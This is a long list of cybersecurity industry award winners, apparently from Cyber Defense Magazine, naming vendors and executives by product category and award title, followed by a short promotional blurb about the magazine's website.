NuData Security, a Mastercard company Market Leader Cybersecurity Service Provider of the Year
Ntirety Editor's Choice Cybersecurity Service Provider of the Year
Redpoint Most Innovative Cybersecurity Service Provider of the Year
Cybersecurity Services
TPx Most Comprehensive Cybersecurity Services
Havoc Shield Most Innovative Cybersecurity Services
Ntirety Editor's Choice Cybersecurity Services
CyZen Publisher's Choice Cybersecurity Services
Cybersecurity Startup of the Year
Cycode Cutting Edge Cybersecurity Startup of the Year
Feroot Security Editor's Choice Cybersecurity Startup of the Year
Grip Security Next Gen Cybersecurity Startup of the Year
Infinipoint Hot Company Cybersecurity Startup of the Year
JupiterOne Most Comprehensive Cybersecurity Startup of the Year
KeyAvi Publisher's Choice Cybersecurity Startup of the Year
Noetic Cyber Market Leader Cybersecurity Startup of the Year
SharkStriker Inc. Most Innovative Cybersecurity Startup of the Year
StrikeReady Cutting Edge Cybersecurity Startup of the Year
Talon Cyber Security Editor's Choice Cybersecurity Startup of the Year
Titaniam Inc. Next Gen Cybersecurity Startup of the Year
Torq Hot Company Cybersecurity Startup of the Year
Cydome Security Most Innovative Cybersecurity Start-up of the Year
Flow Security Ltd. Hot Company Cybersecurity Startup of the Year
Cybersecurity Training
Cybervista Best Product Cybersecurity Training
Infosec Institute Most Comprehensive Cybersecurity Training
Inspired eLearning Publisher's Choice Cybersecurity Training
ITProTV, an ACI Learning Company Market Leader Cybersecurity Training
PECB Most Innovative Cybersecurity Training
RangeForce Cutting Edge Cybersecurity Training
Cybersecurity Training Videos
ConnectWise Editor's Choice Cybersecurity Training Videos
Inspired eLearning Next Gen Cybersecurity Training Videos
Cybersecurity Visionary
Quantum Xchange Hot Company Cybersecurity Visionary
Cybersecurity-as-a-Service (CaaS)
Beijing ThreatBook Technology Co., Ltd. Best Solution Cybersecurity-as-a-Service (CaaS)
Coro Cutting Edge Cybersecurity-as-a-Service (CaaS)
NordLayer Next Gen Cybersecurity-as-a-Service (CaaS)
Data Export Security / Data Security
Cryptoloc Most Comprehensive Data Export Security / Data Security
Data Governance
Egnyte Publisher's Choice Data Governance
Satori Cyber Market Leader Data Governance
Data Loss Prevention
DTEX Systems Most Innovative Data Loss Prevention
GTB Technologies, Inc. Cutting Edge Data Loss Prevention
Laminar Editor's Choice Data Loss Prevention
CoSoSys Next Gen Data Loss Prevention (DLP)
Data Security
1touch.io Hot Company Data Security
Cloudrise, Inc. Best Solution Data Security
Dasera Most Comprehensive Data Security
Egnyte Publisher's Choice Data Security
Flexxon Pte Ltd Cutting-Edge Data Security
GTB Technologies, Inc. Most Innovative Data Security
Imperva Market Leader Data Security
Keeper Security Editor's Choice Data Security
Netskope Next Gen Data Security
Rubrik Hot Company Data Security
ShardSecure Publisher's Choice Data Security
Sotero Editor's Choice Data Security
Secure Data Recovery Services Market Leader Data Security
HelpSystems Unique Solution Data Security
Database Security
Don't Be Breached Most Innovative Database Security
Deception Based Security
Illusive Most Innovative Deception Based Security
Deception-Based Technology
Attivo Networks Market Leader Deception-Based Technology
Deep Sea Phishing
Red Sift Next Gen Deep Sea Phishing
Ericom Software Most Innovative Deep Sea Phishing
Perception Point Hot Company Deep Sea Phishing
Defensive Cyberspace Operations Team of the Year
CSIOS Corporation Publisher's Choice Defensive Cyberspace Operations Team of the Year
DevSecOps
Bishop Fox Most Comprehensive DevSecOps
Contrast Security Publisher's Choice DevSecOps
Cycode Market Leader DevSecOps
Rezilion, Inc. Most Innovative DevSecOps
Security Compass Cutting Edge DevSecOps
Stacklet Editor's Choice DevSecOps
Xmirror Security Hot Company DevSecOps
Digital Executive Protection
BlackCloak Next Gen Digital Executive Protection
Cyble Hot Company Digital Executive Protection
Nisos Best Solution Digital Executive Protection
Digital Footprint Security
IDX Market Leader Digital Footprint Security
Email Security
Perception Point Hot Company Email Security
Email Security and Management
Hornetsecurity Publisher's Choice Email Security and Management
Mimecast Market Leader Email Security and Management
Vipre Security Group Most Innovative Email Security and Management
Microsoft Editor's Choice Email Security and Management
Zix Cutting Edge Email Security and Management
Embedded Security
Lattice Semiconductor Next Gen Embedded Security
Encryption
SafeLogic Hot Company Encryption
Titaniam Inc. Best Product Encryption
Endpoint Security
Absolute Software Most Comprehensive Endpoint Security
ArmorPoint Publisher's Choice Endpoint Security
AT&T Cybersecurity Market Leader Endpoint Security
Bufferzone Security Most Innovative Endpoint Security
DriveLock SE Cutting Edge Endpoint Security
Flexxon Pte Ltd Editor's Choice Endpoint Security
WithSecure Next Gen Endpoint Security
Konica Minolta Business Solutions U.S.A., Inc. Hot Company Endpoint Security
RevBits LLC Best Product Endpoint Security
Syxsense Most Comprehensive Endpoint Security
Talon Cyber Security Publisher's Choice Endpoint Security
ThreatLocker Market Leader Endpoint Security
WatchGuard Technologies Editor's Choice Endpoint Security
Endpoint Security Agent
Microsoft Most Innovative Endpoint Security Agent
Endpoint Security Management
Microsoft Most Cutting Edge Endpoint Security Management
Enterprise Digital Rights Management (EDRM)
SealPath Technologies S.L. Next Gen Enterprise Digital Rights Management (EDRM)
Enterprise Security
Anitian Hot Company Enterprise Security
Darktrace Holdings, LTD Market Leader Enterprise Security
PKWARE Best Product Enterprise Security
Red Sift Best Solution Enterprise Security
Sectigo Limited Cutting Edge Enterprise Security
ERP Security
Onapsis Market Leader ERP Security
Extended Detection and Response (XDR)
Deloitte Most Comprehensive Extended Detection and Response (XDR)
Anomali Publisher's Choice Extended Detection and Response (XDR)
Beijing ThreatBook Technology Co., Ltd. Market Leader Extended Detection and Response (XDR)
Hillstone Networks Most Innovative Extended Detection and Response (XDR)
Hunters Cutting Edge Extended Detection and Response (XDR)
Netsurion Editor's Choice Extended Detection and Response (XDR)
Red Piranha Limited Next Gen Extended Detection and Response (XDR)
RevBits LLC Hot Company Extended Detection and Response (XDR)
Seceon Best Product Extended Detection and Response (XDR)
Secureworks Editor's Choice Extended Detection and Response (XDR)
ThreatQuotient Publisher's Choice Extended Detection and Response (XDR)
AT&T Cybersecurity Most Comprehensive Extended Detection and Response (XDR)
Cynet Publisher's Choice Extended Detection and Response (XDR)
Milton Security, Inc. Market Leader Extended Detection and Response (XDR)
Optiv Security Most Innovative Extended Detection and Response (XDR)
ReliaQuest Cutting Edge Extended Detection and Response (XDR)
Stellar Cyber, Inc. Editor's Choice Extended Detection and Response (XDR)
Trellix Next Gen Extended Detection and Response (XDR)
Fidelis Cybersecurity Hot Company Extended Detection and Response (XDR)
Confluera Best Product Extended Detection and Response (XDR)
Firmware
Eclypsium Best Solution Firmware
Fraud Prevention
Deduce Hot Company Fraud Prevention
FiVerity Cutting Edge Fraud Prevention
Veriff Next Gen Fraud Prevention
IDX Editor's Choice Fraud Prevention
Global MDR Service Provider
Trustwave Best Solution Global MDR Service Provider
Go-To-Market Agency for Cyber Security Startups
ConnectWise Most Comprehensive Go-To-Market Agency for Cyber Security Startups
Governance, Risk and Compliance (GRC)
Stacklet Publisher's Choice Governance, Risk and Compliance (GRC)
Difenda Market Leader Governance, Risk and Compliance (GRC)
SCADAfence Most Innovative Governance, Risk and Compliance (GRC)
Hyperproof Cutting Edge Governance, Risk and Compliance (GRC)
OneTrust Editor's Choice Governance, Risk and Compliance (GRC)
Hardware Access Control
Sepio Systems Inc. Next Gen Hardware Access Control
Healthcare IoT Security
Armis Hot Company Healthcare IoT Security
Asimily Best Solution Healthcare IoT Security
Cybellum Most Comprehensive Healthcare IoT Security
CyberMDX Publisher's Choice Healthcare IoT Security
Cynerio Market Leader Healthcare IoT Security
Palo Alto Networks Most Innovative Healthcare IoT Security
Palo Alto Cutting Edge Healthcare IoT Security
Palo Alto Editor's Choice Healthcare IoT Security
Cybersecurity Product Engineering Services
Sacumen Editor's Choice Cybersecurity Product Engineering Services
ICS/SCADA Security
Armis Cutting Edge ICS/SCADA Security
Radiflow Editor's Choice ICS/SCADA Security
SCADAfence Next Gen ICS/SCADA Security
TXOne Networks Hot Company ICS/SCADA Security
ID Verification
1Kosmos Best Product ID Verification
Identity & Access Management
Imprivata Most Comprehensive Identity & Access Management
Infinipoint Publisher's Choice Identity & Access Management
ManageEngine, a division of Zoho Corporation Cutting Edge Identity & Access Management
Omada Editor's Choice Identity & Access Management
OneLogin Cutting Edge Identity & Access Management
Optimal IdM Editor's Choice Identity & Access Management
Ping Identity Next Gen Identity & Access Management
Britive Hot Company Identity & Access Management
PlainID Best Solution Identity & Access Management
Radiant Logic Most Innovative Identity & Access Management
Keyfactor Publisher's Choice Identity & Access Management
Microsoft Market Leader Identity & Access Management
Transmit Security Hot Company Identity & Access Management
SecureAuth Hot Company Identity & Access Management
Identity Data
Radiant Logic Hot Company Identity Data
Identity Management
D4t4 Solutions Most Comprehensive Identity Management
Keyfactor Publisher's Choice Identity Management
Identity Orchestration
Strata Identity Market Leader Identity Orchestration
Identity Protection
Silverfort Most Innovative Identity Protection
Identity Security
CyberArk Cutting Edge Identity Security
Attivo Networks Editor's Choice Identity Security
Imprivata Next Gen Identity Security
Identity Verification
Trulioo Hot Company Identity Verification
Persona Best Product Identity Verification
Incident Response
Deloitte Most Comprehensive Incident Response
Endace Publisher's Choice Incident Response
Intezer Market Leader Incident Response
Orange Cyberdefense Most Innovative Incident Response
StrikeReady Cutting Edge Incident Response
eSentire Editor's Choice Incident Response
IDX Hot Company Incident Response
Industrial Cybersecurity
Cybellum Next Gen Industrial Cybersecurity
Forescout Technologies, Inc. Hot Company Industrial Cybersecurity
TXOne Networks Best Product Industrial Cybersecurity
Zuul IoT Editor's Choice Industrial Cybersecurity
Information Technology Vendor Risk Management (ITVRM)
OneTrust Next Gen Information Technology Vendor Risk Management (ITVRM)
InfoSec Startup of the Year
BedRock Systems Inc. Editor's Choice InfoSec Startup of the Year
BreachQuest Publisher's Choice Infosec Startup of the Year
CYBERGROOT Limited Hot Company InfoSec Startup of the Year
Cyble Next Gen InfoSec Startup of the Year
Neosec Cutting Edge InfoSec Startup of the Year
Valence Security Publisher's Choice Infosec Startup of the Year
Insider Threat Detection
Code42 Market Leader Insider Threat Detection
ExtraHop Next Gen Insider Threat Detection
Gurucul Cutting Edge Insider Threat Detection
VMware Most Innovative Insider Threat Detection
Insider Threat Prevention
Advanced Onion, Inc. Hot Company Insider Threat Prevention
Deloitte Editor's Choice Insider Threat Prevention
DTEX Systems Publisher's Choice Insider Threat Prevention
Insider Threat Protection
Deloitte Best Solution Insider Threat Protection
Internet of Things (IoT) Security
Armis Most Comprehensive Internet of Things (IoT) Security
Forescout Technologies, Inc. Publisher's Choice Internet of Things (IoT) Security
Order Market Leader Internet of Things (IoT) Security
SCADAfence Most Innovative Internet of Things (IoT) Security
SecuriThings Cutting Edge Internet of Things (IoT) Security
SAM Seamless Network Editor’s Choice Internet of Things (IoT) Security
Intrusion Detection System (IDS)
INTRUSION Editor's Choice Intrusion Detection System (IDS)
Low-code/no-code Security
Torq Hot Company Low-code/no-code Security
Zenity.io Best Product Low-code/no-code Security
Valence Security Most Innovative Low-code/no-code Security
Machine Identity Management
Venafi Most Comprehensive Machine Identity Management
Malware Analysis
Intezer Publisher's Choice Malware Analysis
Managed Detection & Response (MDR)
Deepwatch Market Leader Managed Detection & Response (MDR)
Deloitte Most Innovative Managed Detection & Response (MDR)
Alert Logic Cutting Edge Managed Detection & Response (MDR)
eSentire Editor's Choice Managed Detection & Response (MDR)
Critical Insight Next Gen Managed Detection & Response (MDR)
Netsurion Hot Company Managed Detection & Response (MDR)
Orange Cyberdefense Best Product Managed Detection & Response (MDR)
GM Sectec Market Leader Managed Detection & Response (MDR)
Logichub Hot Company Managed Detection & Response (MDR)
Avertium LLC Most Comprehensive Managed Detection & Response (MDR)
CriticalStart Publisher's Choice Managed Detection & Response (MDR)
WithSecure Market Leader Managed Detection & Response (MDR)
Milton Security, Inc. Most Innovative Managed Detection & Response (MDR)
ReliaQuest Cutting Edge Managed Detection & Response (MDR)
Managed Detection and Response (MDR) Service Provider
ConnectWise Most Comprehensive Managed Detection and Response (MDR) Service Provider
Difenda Most Innovative Managed Detection and Response (MDR) Service Provider
Open Systems Editor's Choice Managed Detection and Response (MDR) Service Provider
SilverSky Publisher's Choice Managed Detection and Response (MDR) Service Provider
Neustar Security Services Next Gen Managed Detection and Response (MDR) Service Provider
Proficio Editor's Choice Managed Detection and Response (MDR) Service Provider
Critical Start Hot Company Managed Detection and Response (MDR) Service Provider
Managed Endpoint Security
Nuspire Cutting Edge Managed Endpoint Security
Managed Security Service Provider (MSSP)
Simeio Most Comprehensive Managed Security Service Provider (MSSP)
Tata Communications Publisher's Choice Managed Security Service Provider (MSSP)
TrustNet Editor's Choice Managed Security Service Provider (MSSP)
Netsurion Most Innovative Managed Security Service Provider (MSSP)
Orange Cyberdefense Cutting Edge Managed Security Service Provider (MSSP)
Seceon Hot Company Managed Security Service Provider (MSSP)
Thrive Next Gen Managed Security Service Provider (MSSP)
GM Sectec Market Leader Managed Security Service Provider (MSSP)
Neustar Security Services Next Gen Managed Security Service Provider (MSSP)
ArmorPoint Best Solution Managed Security Service Provider (MSSP)
AT&T Cybersecurity Market Leader Managed Security Service Provider (MSSP)
Avertium Hot Company Managed Security Service Provider (MSSP)
Management and SaaS/Cloud Security
Gigamon Best Solution Management and SaaS/Cloud Security
Micro-Segmentation
Airgap Networks Best Product Micro-segmentation
ColorTokens Inc. Hot Company Micro-segmentation
Mobile Application Security
Verimatrix Most Comprehensive Mobile Application Security
Guardsquare Publisher's Choice Mobile Application Security
Mobile Device Security
Certo Software Ltd Market Leader Mobile Device Security
Hypori Most Innovative Mobile Device Security
Mobile Endpoint Security
SyncDog Cutting Edge Mobile Endpoint Security
MSSP of the Year
Masergy Communications, Inc. Editor's Choice MSSP of the Year
Multi-Factor Authentication
1Kosmos Most Comprehensive Multi-Factor Authentication
BIO-key International, Inc. Publisher's Choice Multi-Factor Authentication
WatchGuard Technologies Next Gen Multi-Factor Authentication
Network Detection and Response
NETSCOUT Market Leader Network Detection and Response
Network Security
Calix Market Leader Network Security
Gigamon Most Innovative Network Security
Network Security and Management
Tufin Cutting Edge Network Security and Management
Corelight Editor's Choice Network Security and Management
Endace Next Gen Network Security and Management
Versa Networks Best Solution Network Security and Management
ZERO Networks Market Leader Network Security and Management
WatchGuard Technologies Hot Company Network Security and Management
Neustar Security Services Next Gen Network Security and Management
AT&T Cybersecurity Market Leader Network Security Management
Network Security Services
Tata Communications Next Gen Network Security Services
Next Generation Firewall (NGFW)
Hillstone Networks Publisher's Choice Next Generation Firewall (NGFW)
Reblaze Editor's Choice Next Generation Firewall (NGFW)
PAM for Cloud Infrastructure
Keeper Security Next Gen PAM for Cloud Infrastructure
Packet Capture Platform
Endace Most Innovative Packet Capture Platform
Passwordless Authentication
1Kosmos Cutting Edge Passwordless Authentication
Secret Double Octopus Editor's Choice Passwordless Authentication
Microsoft Next Gen Passwordless Authentication
Keeper Security Market Leader Passwordless Authentication
Penetration Testing
Bishop Fox Most Comprehensive Penetration Testing
Digital Silence Publisher's Choice Penetration Testing
Horizon3.ai Market Leader Penetration Testing
NetSPI Most Innovative Penetration Testing
Ridge Security Technology Cutting Edge Penetration Testing
SecurityMetrics Editor's Choice Penetration Testing
Cobalt Next Gen Penetration Testing
Policy Management
AlgoSec Hot Company Policy Management
PR firm for Infosec Companies
Madison Alexander Most Innovative PR firm for Infosec Companies
Privacy and Security Compliance Automation
Coviant Software Best Solution Privacy and Security Compliance Automation
Privacy and Security Software (SMB)
Carbide Hot Company Privacy and Security Software (SMB)
Privileged Access Management (PAM)
Devolutions Editor's Choice Privileged Access Management (PAM)
Delinea Publisher's Choice Privileged Access Management (PAM)
Imprivata Market Leader Privileged Access Management (PAM)
RevBits LLC Most Innovative Privileged Access Management (PAM)
Delinea Cutting Edge Privileged Access Management (PAM) for Cloud Infrastructure
Privileged Account Security
Remediant Editor's Choice Privileged Account Security
Process Automation
HelpSystems Market Leader Process Automation
Railway Cybersecurity
Cervello Best Solution Railway Cybersecurity
Ransomless Ransomware Protection
Cryptoloc Next Gen Ransomless Ransomware Protection
Ericom Software Most Comprehensive Ransomless Ransomware Protection
Minerva Labs Publisher's Choice Ransomless Ransomware Protection
Ransomware Assessment
Digital Silence Market Leader Ransomware Assessment
Ransomware Data Security Solution
Titaniam Most Innovative Ransomware Data Security Solution
Ransomware Protection of SaaS Data
Gigamon Cutting Edge Ransomware Protection of SaaS Data
Spin Technology Inc. Next Gen Ransomware Protection of SaaS Data
Ransomware Security Solution
KeyAvi Next Gen Ransomware Security Solution
Remote Workforce Security
Airgap Networks Hot Company Remote Workforce Security
Response and Cloud Security
Fidelis Cybersecurity Best Solution Response and Cloud Security
Risk Management
Hyperproof Most Innovative Risk Management
LexisNexis Risk Solutions Publisher's Choice Risk Management
Reciprocity Hot Company Risk Management
SecurityScorecard Most Comprehensive Risk Management
Tanium Market Leader Risk Management
ThreatConnect, Inc Editor's Choice Risk Management
Vulcan Cyber Next Gen Risk Management
CyberSaint Security Most Comprehensive Risk Management
Risk-based Vulnerability Management (RBVM)
Proficio Most Comprehensive Risk-based Vulnerability Management (RBVM)
Cydome Security Publisher's Choice Risk-based Vulnerability Management (RBVM)
Skybox Security Market Leader Risk-based Vulnerability Management (RBVM)
RiskRecon, a Mastercard Company Most Innovative Risk-based Vulnerability Management (RBVM)
SaaS Security
BetterCloud Cutting Edge SaaS Security
SaaS/Cloud Security
Anitian Most Comprehensive SaaS/Cloud Security
AppOmni Publisher's Choice SaaS/Cloud Security
Authomize Market Leader SaaS/Cloud Security
Banyan Security Most Innovative SaaS/Cloud Security
Beijing ThreatBook Technology Co., Ltd. Cutting Edge SaaS/Cloud Security
Canonic Security Editor's Choice SaaS/Cloud Security
Ericom Software Next Gen SaaS/Cloud Security
Grip Security Hot Company SaaS/Cloud Security
Iboss Best Product SaaS/Cloud Security
JupiterOne Best Solution SaaS/Cloud Security
Spin Technology Next Gen SaaS/Cloud Security
Suridata Next Gen SaaS/Cloud Security
Wing Security Hot Company SaaS/Cloud Security
Adaptive Shield Next Gen SaaS/Cloud Security
Valence Security Hot Company SaaS/Cloud Security
Secrets Management
Keeper Security Hot Company Secrets Management
1Password Hot Company Secrets Management
Secure Coding: Developer Upskilling
HackEDU Cutting Edge Secure Coding: Developer Upskilling
Secure Communications
Quantum Xchange Next Gen Secure Communications
Secure Low Code/No Code Process Automation
Coviant Next Gen Secure Low Code/No Code Process Automation
Secure Managed File Transfer
Coviant Hot Company Secure Managed File Transfer
Secure SaaS Backups
Spin Technology Most Innovative Secure SaaS Backups
Security Awareness Training
CybeReady Hot Company Security Awareness Training
Infosec Institute Publisher's Choice Security Awareness Training
KnowBe4 Market Leader Security Awareness Training
Living Security Most Innovative Security Awareness Training
Security Mentor, Inc. Cutting Edge Security Awareness Training
Mimecast Most Comprehensive Security Awareness Training
Global Learning Systems Editor's Choice Security Awareness Training
Security Company of the Year
HUMAN Security, Inc. Hot Company Security Company of the Year
Anitian Hot Company Security Company of the Year
Cyble Publisher's Choice Security Company of the Year
Mandiant Market Leader Security Company of the Year
Noname Security Most Innovative Security Company of the Year
Raytheon Intelligence & Space Cutting Edge Security Company of the Year
ReliaQuest Editor's Choice Security Company of the Year
RevBits LLC Next Gen Security Company of the Year
Sangfor Technologies Inc. Hot Company Security Company of the Year
Sectigo Limited Editor's Choice Security Company of the Year
WatchGuard Technologies Most Comprehensive Security Company of the Year
Security Essentials
Microsoft Best Product Security Essentials
Security Information Event Management (SIEM)
ConnectWise Most Comprehensive Security Information Event Management (SIEM)
Gurucul Publisher's Choice Security Information Event Management (SIEM)
ManageEngine, a division of Zoho Corporation Market Leader Security Information Event Management (SIEM)
Panther Most Innovative Security Information Event Management (SIEM)
Seceon Cutting Edge Security Information Event Management (SIEM)
SECUINFRA GmbH Editor's Choice Security Information Event Management (SIEM)
Security Investigation Platform
Endace Next Gen Security Investigation Platform
ThreatQuotient Hot Company Security Investigation Platform
Security Orchestration Automation & Response (SOAR)
Sumo Logic Best Product Security Orchestration Automation & Response (SOAR)
ManageEngine, a division of Zoho Corporation Publisher's Choice Security Orchestration, Automation & Response (SOAR)
Torq Cutting Edge Security Orchestration, Automation & Response (SOAR)
Siemplify Market Leader Security Orchestration, Automation & Response (SOAR)
SIRP Labs Editor's Choice Security Orchestration, Automation & Response (SOAR)
Security Project of the Year
UncommonX Most Innovative Security Project of the Year
DXC Technology Hot Company Security Project of the Year
Security Ratings
FortifyData Hot Company Security Ratings
Security Software
Cyolo Publisher's Choice Security Software
ThreatConnect, Inc Market Leader Security Software
Security Team of the Year
BreachQuest Next Gen Security Team of the Year
ConnectWise Most Comprehensive Security Team of the Year
Thrive Most Innovative Security Team of the Year
Zoom Video Communications, Inc. Cutting Edge Security Team of the Year
Bank of America Hot Company Security Team of the Year
Security Training
ITProTV, an ACI Learning Company Next Gen Security Training
Self-Protecting Data Security
KeyAvi Unique Self-Protecting Data Security
Xmirror Security Hot Company Self-Protecting Data Security
SMB Cybersecurity
A-LIGN Hot Company SMB Cybersecurity
Allot Publisher's Choice SMB Cybersecurity
Coro Market Leader SMB Cybersecurity
CYREBRO Most Innovative SMB Cybersecurity
Defendify Cutting Edge SMB Cybersecurity
JumpCloud Editor's Choice SMB Cybersecurity
Netsurion Next Gen SMB Cybersecurity
Zix Hot Company SMB Cybersecurity
WatchGuard Technologies Most Comprehensive SMB Cybersecurity
SMB MSSP
UncommonX Cutting Edge SMB MSSP
SOC-as-a-Service
ArmorPoint Next Gen SOC-as-a-Service
Milton Security, Inc. Market Leader SOC-as-a-Service
Tata Communications Publisher's Choice SOC-as-a-Service
Netsurion Hot Company SOC-as-a-Service
Software Composition Analysis
Rezilion, Inc. Cutting Edge Software Composition Analysis
Software Development Lifecycle Security
Rezilion, Inc. Hot Company Software Development Lifecycle Security
Contrast Security Market Leader Software Development Lifecycle Security
Cycode Most Innovative Software Development Lifecycle Security
Wabbi Publisher's Choice Software Development Lifecycle Security
Software Supply Chain Security
aDolus Technology Inc. Most Innovative Software Supply Chain Security
Cycode Cutting Edge Software Supply Chain Security
GrammaTech Editor's Choice Software Supply Chain Security
Xmirror Security Next Gen Software Supply Chain Security
Startup of the Year
Ridge Security Technology Most Innovative Startup of the Year
Storage and Archiving
Intel Corporation Market Leader Storage and Archiving
Supply Chain Risk
Advanced Onion, Inc. Cutting Edge Supply Chain Risk
Telecom Fraud Protection
AB Handshake Next Gen Telecom Fraud Protection
Telecom Network Security
Allot Cutting Edge Telecom Network Security
Third Party Cyber Risk Management (TPCRM)
Panorays Next Gen Third Party Cyber Risk Management (TPCRM)
SBER Market Leader Third Party Cyber Risk Management (TPCRM)
Astrix Security Editor's Choice Third Party Cyber Risk Management (TPCRM)
CyberGRX Hot Company Third Party Cyber Risk Management (TPCRM)
Third Party Risk Management (TPRM)
Cyble Next Gen Third Party Risk Management (TPRM)
HITRUST Services Corp. Hot Company Third Party Risk Management (TPRM)
Resecurity, Inc. Editor's Choice Third Party Risk Management (TPRM)
Threat Detection, Incident Response, Hunting and Triage Platform
Anvilogic Most Innovative Threat Detection, Incident Response, Hunting and Triage Platform
Threat Hunting
Deloitte Publisher's Choice Threat Hunting
Threat Intelligence
Anomali Most Comprehensive Threat Intelligence
Beijing ThreatBook Technology Co., Ltd. Publisher's Choice Threat Intelligence
Cognyte Market Leader Threat Intelligence
Cyberint Most Innovative Threat Intelligence
Cybersixgill Cutting Edge Threat Intelligence
Cyble Editor's Choice Threat Intelligence
Cyware Next Gen Threat Intelligence
Deloitte Hot Company Threat Intelligence
Intezer Best Product Threat Intelligence
Nisos Next Gen Threat Intelligence
Orange Cyberdefense Market Leader Threat Intelligence
Silobreaker Editor's Choice Threat Intelligence
ThreatQuotient Publisher's Choice Threat Intelligence
Cobwebs Technologies Ltd. Next Gen Threat Intelligence
BrightCloud Best Solution Threat Intelligence
Microsoft Most Comprehensive Threat Intelligence
Threat Modeling
OptimEyes.ai Next Gen Threat Modeling
StrikeReady Hot Company Threat Modeling
ThreatModeler Software Inc. Best Product Threat Modeling
ThreatModeler Software Inc. Publisher's Choice Threat Modeling
Unified Threat Management (UTM)
Deloitte Publisher's Choice Unified Threat Management (UTM)
Arista Networks Market Leader Unified Threat Management (UTM)
BitNinja Security Cutting Edge Unified Threat Management (UTM)
Unlimited Encrypted Data Sharing
Clarabot Zrt. Hot Company Unlimited Encrypted Data Sharing
User Behavior Analytics (UBA)
ManageEngine, a division of Zoho Corporation Next Gen User Behavior Analytics (UBA)
Virtual Directory Services
Optimal IdM Cutting Edge Virtual Directory Services
VPN
Infiot Inc. Most Innovative VPN
MacPaw Hot Company VPN
Neustar Security Services Next Gen VPN
Vulnerability Assessment, Remediation and Management
Attivo Networks Cutting Edge Vulnerability Assessment, Remediation and Management
Skybox Security Editor's Choice Vulnerability Assessment, Remediation and Management
Thrive Hot Company Vulnerability Assessment, Remediation and Management
Bosch AIShield Publisher's Choice Vulnerability Assessment, Remediation and Management
CYE Market Leader Vulnerability Assessment, Remediation and Management
Vulnerability Intelligence
SBER Most Innovative Vulnerability Intelligence
Silobreaker Cutting Edge Vulnerability Intelligence
Vulnerability Management
Difenda Editor's Choice Vulnerability Management
Rezilion, Inc. Next Gen Vulnerability Management
Web Application Security
OPSWAT Best Solution Web Application Security
Reblaze Best Product Web Application Security
Source Defense Next Gen Web Application Security
ThreatX Most Innovative Web Application Security
Cloudbric Editor's Choice Web Application Security
Neustar Security Services Publisher's Choice Web Application Security
Web Security
Red Access Publisher's Choice Web Security
Zero Trust
Absolute Software Market Leader Zero Trust
Axis Security Most Innovative Zero Trust
Banyan Security Cutting Edge Zero Trust
BedRock Systems Inc. Editor's Choice Zero Trust
Cyolo Next Gen Zero Trust
Ericom Software Hot Company Zero Trust
Forescout Technologies, Inc. Most Comprehensive Zero Trust
Illumio Publisher's Choice Zero Trust
INTRUSION Next Gen Zero Trust
Skyhigh Security Most Comprehensive Zero Trust
Netskope Publisher's Choice Zero Trust
Pathlock Market Leader Zero Trust
Remediant Most Innovative Zero Trust
RevBits LLC Cutting Edge Zero Trust
Cloudbric Next Gen Zero Trust
Keeper Security Next Gen Zero Trust
Zero Trust Application Protection
Anitian Editor's Choice Zero Trust Application Protection
BedRock Systems Inc. Next Gen Zero Trust Application Protection
Titaniam Inc. Hot Company Zero Trust Application Protection
TrueFort Best Product Zero Trust Application Protection
Zero Trust for Hybrid Enterprise
ColorTokens Best Solution Zero Trust for Hybrid Enterprise
Zero Trust Security
ColorTokens Publisher's Choice Zero Trust Security
Application Security Posture Management Expert
Pankaj Moolrajani Editor's Choice Delta Dental of California
CEO of the Year
Darren Guccione Editor's Choice Keeper Security
Stu Sjouwerman Publisher's Choice KnowBe4
Vijay Balasubramaniyan Cutting Edge Pindrop
Brian Murphy Next Gen ReliaQuest
Rob Davis Most Innovative CriticalStart
Erkang Zheng Next Gen JupiterOne
Chief Information Officer of the Year
Sean Thurston Editor's Choice KeyAvi
Chief Information Security Officer of the Year
John Hammes Next Gen Intelligent Waves LLC
T.J. Minichillo Editor's Choice KeyAvi
Bret Arsenault Publisher's Choice Microsoft
Craig Froelich Most Innovative Bank of America
Chief Product Officer of the Year - Cybersecurity Startup
Shai Guday Publisher's Choice Chief Product Officer of the Year - Cybersecurity Startup
CTO of the Year
Tony Cole Cutting Edge Attivo Networks
Craig Lurey Editor's Choice Keeper Security
Continuous Improvement and Optimization Expert of the Year
Cesar Pie Editor's Choice CSIOS Corporation
CyberSecurity and Resiliency Risk Researcher
Dr. Anil Lamba Relentless CyberSecurity and Resiliency Risk Researcher
Microservices Security Expert
Pankaj Moolrajani Editor's Choice Delta Dental of California
Mobile Endpoint Security
Kathleen McGill Editor's Choice Trusted Computing Group
Privacy Expert of the Year
Stephen Cavey Publisher's Choice Ground Labs
Product Security Expert
Pankaj Moolrajani Editor's Choice Keep Truckin
Professional Cybersecurity Services of the Year
Sean Thurston Cutting Edge KeyAvi
Security Expert of the Year
Laurent Celerier Publisher's Choice Orange Cyberdefense
Joe Slowik Publisher's Choice Gigamon
Threat Intelligence
Brett Paradis Cutting Edge KeyAvi
Top Women in Cybersecurity
Alina Ribeiro Orange Cyberdefense
Amy Nelson Trusted Computing Group
Brittany Greenfield Wabbi
Bobbi Turner ConnectWise
Céline Gravelines KeyAvi
Carolyn Crandall Attivo Networks
Dr. Marie White Security Mentor, Inc.
Emilyann Fogarty Datto
Inbar Ries, CPO CYE
Julie Giannini Egnyte
Jen Stone SecurityMetrics
Michelle Welch WatchGuard Technologies
Simone Petrella Cybervista
Sarah Ashburn Attivo Networks
Women in Cybersecurity Scholarship
Veronika Jack Winner ACL/SBHS
Books by our Publisher: https://www.amazon.com/Cryptoconomy-Bitcoins-Blockchains-Bad-Guys-ebook/dp/B07KPNS9NH (with others coming soon...)
10 Years in The Making…
Thank You to our Loyal Subscribers!
We've Completely Rebuilt CyberDefenseMagazine.com - Please Let Us Know What You Think. It's mobile and tablet friendly and superfast. We hope you like it. In addition, we're past the five nines of 7x24x365 uptime as we continue to scale with improved Web Application Firewalls, Content Delivery Networks (CDNs) around the Globe, Faster and More Secure DNS, and CyberDefenseMagazine.com up and running as an array of live mirror sites and our new B2C consumer magazine CyberSecurityMagazine.com. Millions of monthly readers and new platforms coming…starting with www.cyberdefenseconferences.com this month…